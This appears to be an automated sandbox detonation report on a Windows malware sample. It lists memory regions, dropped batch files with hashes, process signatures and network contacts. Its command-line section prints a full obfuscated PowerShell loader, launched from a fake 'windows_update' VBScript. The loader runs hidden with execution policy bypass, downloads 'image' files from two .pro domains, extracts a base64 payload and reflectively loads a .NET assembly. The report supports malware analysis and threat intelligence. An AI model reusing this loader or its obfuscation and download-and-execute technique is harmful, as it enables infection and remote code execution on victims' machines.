memory/3092-22-0x0000023EE9700000-0x0000023EE9710000-memory.dmp
memory/3092-21-0x0000023EE9700000-0x0000023EE9710000-memory.dmp
memory/3092-29-0x00007FFD088C0000-0x00007FFD09381000-memory.dmp
memory/5084-30-0x000001F462430000-0x000001F462444000-memory.dmp
memory/5084-31-0x00007FFD26E90000-0x00007FFD27085000-memory.dmp
memory/5084-32-0x00007FFD266B0000-0x00007FFD2676E000-memory.dmp
memory/5084-34-0x000001F4627F0000-0x000001F4627FE000-memory.dmp
memory/5084-33-0x000001F462440000-0x000001F46244C000-memory.dmp
memory/5084-35-0x000001F447ED0000-0x000001F447EE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dbxcjp.bat
| MD5 | 7834dbd67492fa350447dbd5debda5fc |
| SHA1 | e008dff36158beb0425d32036d9f65d5653184bd |
| SHA256 | d96f10a2672eb846ecb66d836dfe82933aca60094a367a90eee3aac0444a5573 |
| SHA512 | 02ac02dfd61f1ce96f79899523aedd6efd26a269bfecf4507ad3008fa384f9f2d9c9fac71664f7f0b1f6bdf6a397ee6757c199c0971f0b9803409f0c48d7206a |
memory/1464-42-0x0000000005000000-0x0000000005036000-memory.dmp
memory/1464-41-0x0000000074AE0000-0x0000000075290000-memory.dmp
memory/5084-45-0x000001F447ED0000-0x000001F447EE0000-memory.dmp
memory/1464-47-0x00000000057A0000-0x0000000005DC8000-memory.dmp
memory/1464-46-0x0000000005160000-0x0000000005170000-memory.dmp
memory/1464-44-0x0000000005160000-0x0000000005170000-memory.dmp
memory/5084-43-0x00007FFD088C0000-0x00007FFD09381000-memory.dmp
memory/1464-48-0x0000000005720000-0x0000000005742000-memory.dmp
memory/1464-50-0x0000000005FA0000-0x0000000006006000-memory.dmp
memory/1464-49-0x0000000005E40000-0x0000000005EA6000-memory.dmp
memory/1464-60-0x0000000006020000-0x0000000006374000-memory.dmp
memory/1464-61-0x00000000064D0000-0x00000000064EE000-memory.dmp
memory/1464-62-0x0000000006520000-0x000000000656C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | a26df49623eff12a70a93f649776dab7 |
| SHA1 | efb53bd0df3ac34bd119adf8788127ad57e53803 |
| SHA256 | 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245 |
| SHA512 | e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c |
C:\Users\Admin\AppData\Local\Temp\qiygww.cmd
| MD5 | f95dfe17a283dbb9301936821032b9a4 |
| SHA1 | 357edc773d07784e7fd295c2b273305994789fc4 |
| SHA256 | 22d6876c6b04fb74787a5e0803e62ed9c30cd05340ac0eb18ca358c916c3165c |
| SHA512 | 2a423ab3c92945600ef1ecc73e0e5ae46c69971b812985b46706b2447b7da1a259a3411e98ffea034aa6cc0880c154bd804785484bf9355357815d1c066d8de8 |
memory/5084-68-0x000001F447ED0000-0x000001F447EE0000-memory.dmp
memory/1880-69-0x0000000074AE0000-0x0000000075290000-memory.dmp
memory/1880-70-0x0000000004B80000-0x0000000004B90000-memory.dmp
memory/1880-71-0x0000000004B80000-0x0000000004B90000-memory.dmp
memory/1464-73-0x00000000069F0000-0x0000000006A0A000-memory.dmp
memory/1464-74-0x0000000006A40000-0x0000000006A62000-memory.dmp
memory/1464-72-0x00000000074B0000-0x0000000007546000-memory.dmp
memory/1464-81-0x0000000007B40000-0x00000000080E4000-memory.dmp
memory/1464-85-0x0000000008770000-0x0000000008DEA000-memory.dmp
memory/1464-86-0x0000000007830000-0x0000000007A62000-memory.dmp
memory/1464-87-0x00000000080F0000-0x0000000008312000-memory.dmp
memory/1880-89-0x0000000007260000-0x00000000074C2000-memory.dmp
memory/1880-91-0x0000000007DB0000-0x0000000007E42000-memory.dmp
memory/1880-90-0x00000000074D0000-0x000000000772C000-memory.dmp
memory/1880-92-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-93-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-95-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-97-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-100-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-103-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-105-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-107-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-109-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-111-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-113-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-115-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-117-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-119-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-121-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-123-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-125-0x00000000074D0000-0x0000000007727000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mfgpgc.bat
| MD5 | b73dc1ad88598d67c62f694c382be267 |
| SHA1 | 7a5574b1e22e860e71c47104a588cfbcc78f9a63 |
| SHA256 | 6ee076cc6d3be85fbb81e4d42276af43fcf3be7445de87d6e0497c9993ca2687 |
| SHA512 | d3afb4291432110a063be5506c4d96a82247fa666338e9ce02f19cb3d112118d65a1c1e83947cbe914f10c484f196172cf032e015b4ab00b3a08cca0c1aab675 |
memory/1880-128-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-131-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-133-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-135-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-137-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-139-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-141-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-145-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-147-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-149-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-151-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-153-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-155-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-157-0x00000000074D0000-0x0000000007727000-memory.dmp
memory/1880-159-0x00000000074D0000-0x0000000007727000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ixgyed.bat
| MD5 | a27d0d05a470dc95f1c74c7861761e9f |
| SHA1 | c4533a4822975c7a6316e375e365df82676dce76 |
| SHA256 | 3efe939bbca5c286978f8695ddeda122222cac8aef1c53ab8a63007e5a3287b7 |
| SHA512 | 7b3fb05433f58375e1d127f767ccd2cbc90cdce3651127db03d87867cf840002405aeaccebf16c2d1f6242e56b9fc8932210c7f194ecb8204ff1c3616b45409f |
memory/5084-351-0x000001F447ED0000-0x000001F447EE0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | def29ac8e5cffef459c3d64d6bb18fb2 |
| SHA1 | ab64966735208644930daf81af0fde24993d7d20 |
| SHA256 | 1fc6235ced7ccb482365969ccf76b6e54ed12fb3bb09a7bd37e2fa161a09fe57 |
| SHA512 | c62966b63c9d7706beb01c9e29b014c2a10307a06defbb3d0137d7af97f211e87140098617a30f1dc0637f9b0e7d008d5f9b88a8cf2c78d3f97450aa77efef45 |
memory/1464-727-0x0000000074AE0000-0x0000000075290000-memory.dmp
memory/1548-729-0x0000000074AE0000-0x0000000075290000-memory.dmp
memory/1548-731-0x00000000048E0000-0x00000000048F0000-memory.dmp
memory/1548-732-0x00000000048E0000-0x00000000048F0000-memory.dmp
memory/1548-798-0x0000000006DC0000-0x0000000006FF0000-memory.dmp
memory/1548-805-0x00000000076D0000-0x00000000078EE000-memory.dmp
memory/1880-867-0x0000000074AE0000-0x0000000075290000-memory.dmp
memory/1880-868-0x0000000004B80000-0x0000000004B90000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240215-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2944 wrote to memory of 2152 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2944 wrote to memory of 2152 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2944 wrote to memory of 2152 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2152 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2152 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2152 wrote to memory of 2756 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\update.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreaQBuDgTreGQDgTreYQBiDgTreGkDgTreZDgTreDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreQQBkDgTreG8DgTreYgBlDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.indabid/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 104.21.37.30:443 | nanoshield.pro | tcp |
Files
memory/2152-5-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2152-6-0x0000000002C30000-0x0000000002CB0000-memory.dmp
memory/2152-7-0x0000000002290000-0x0000000002298000-memory.dmp
memory/2152-4-0x000000001B790000-0x000000001BA72000-memory.dmp
memory/2152-9-0x0000000002C30000-0x0000000002CB0000-memory.dmp
memory/2152-8-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2152-10-0x0000000002C30000-0x0000000002CB0000-memory.dmp
memory/2152-11-0x0000000002C30000-0x0000000002CB0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N49VBC6DQ5BB7A5T25YX.temp
| MD5 | 67bbe7e09328fc2471b8d522d32e9df8 |
| SHA1 | a572e8c7f62262893b7fdaddb456853fa8747df4 |
| SHA256 | d15c9016f579b6c3f48705edd42ae087efdfc1c07a3ee7f7540c8266aaf319f2 |
| SHA512 | 8bc81074d9d25db83f692381baeb4056e5b46f6a277ab9a05059daeb6fb9300fe2b81f2b690550f3bb9a2c84ee4111356342569e0ffb9c997c09bf9ea4cd10db |
memory/2756-17-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2756-18-0x0000000002E30000-0x0000000002EB0000-memory.dmp
memory/2756-19-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2756-20-0x0000000002E30000-0x0000000002EB0000-memory.dmp
memory/2756-21-0x0000000002E30000-0x0000000002EB0000-memory.dmp
memory/2756-22-0x000000001AEB0000-0x000000001AEFE000-memory.dmp
memory/2756-23-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2152-24-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20231129-en
Max time kernel
119s
Max time network
121s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
